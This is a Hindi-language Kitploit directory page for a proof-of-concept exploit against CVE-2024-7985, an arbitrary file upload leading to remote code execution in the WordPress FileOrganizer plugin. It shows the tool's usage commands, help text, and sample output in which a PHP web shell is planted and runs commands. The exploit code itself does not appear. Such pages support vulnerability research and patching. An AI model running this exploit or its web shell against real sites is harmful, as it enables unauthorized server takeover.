Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/nxploited/cve-2024-7985-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2024-7985-poc

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - प्रमाणित (सब्सक्राइबर+) मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - प्रमाणित (Subscriber+) मनमाना फ़ाइल अपलोड

FileOrganizer Exploit - CVE-2024-7985

📌 अवलोकन

CVE-2024-7985 - WordPress प्लगिन FileOrganizer <= 1.0.9 प्रमाणित मनमाना फ़ाइल अपलोड के लिए संवेदनशील है, जिससे Subscriber+ विशेषाधिकार वाले हमलावर दूरस्थ रूप से दुर्भावनापूर्ण फ़ाइलें अपलोड और निष्पादित कर सकते हैं। यह कमज़ोरी fileorganizer_ajax_handler फ़ंक्शन में फ़ाइल प्रकार सत्यापन की कमी के कारण उत्पन्न होती है, जिससे दूरस्थ कोड निष्पादन (RCE) संभव होता है।

🚨 यह शोषण हमलावरों को सर्वर पर मनमाने आदेश निष्पादित करने की अनुमति देता है! 🚨

⚡ विशेषताएँ

  • ✅ हमले को स्वचालित करता है - लॉगिन, nonce प्राप्त करना, exploit।
  • ✅ प्रमाणित उपयोगकर्ता विशेषाधिकारों का उपयोग करके सुरक्षा जाँचों को बायपास करता है।
  • ✅ स्वचालित संस्करण पहचान - सुनिश्चित करता है कि लक्ष्य संवेदनशील है।
  • ✅ कस्टम कमांड निष्पादन - उपयोगकर्ता कोई भी कमांड निर्दिष्ट कर सकता है।
  • ✅ SSL सत्यापन समस्याओं को सहजता से संभालता है।

🛠️ आवश्यकताएँ

  • Python 3
  • requests
  • beautifulsoup4

निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install requests beautifulsoup4

🚀 उपयोग

root@kitploit:~
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"

📖 उपयोग - सहायता

root@kitploit:~
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]

FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi

options:
  -h, --help           show this help message and exit
  --url URL            Target WordPress site URL
  --username USERNAME  WordPress Username
  --password PASSWORD  WordPress Password
  --cmd CMD            Command to execute in uploaded file

उदाहरण आउटपुट:

root@kitploit:~
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami

🔍 शोषण कार्यप्रवाह

1️⃣ संस्करण जाँच - निर्धारित करता है कि साइट संवेदनशील है या नहीं।
2️⃣ प्रमाणीकरण - WordPress में लॉगिन करता है।
3️⃣ Nonce निष्कर्षण - सुरक्षा टोकन प्राप्त करता है।
4️⃣ फ़ाइल अपलोड - एक दुर्भावनापूर्ण PHP स्क्रिप्ट अपलोड करता है।
5️⃣ कमांड निष्पादन - उपयोगकर्ता द्वारा निर्दिष्ट कमांड निष्पादित करता है।


📌 अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है; लेखक किसी भी दुरुपयोग या परिणामों के लिए कोई जिम्मेदारी नहीं लेता है। 🚨

टूल डाउनलोड करें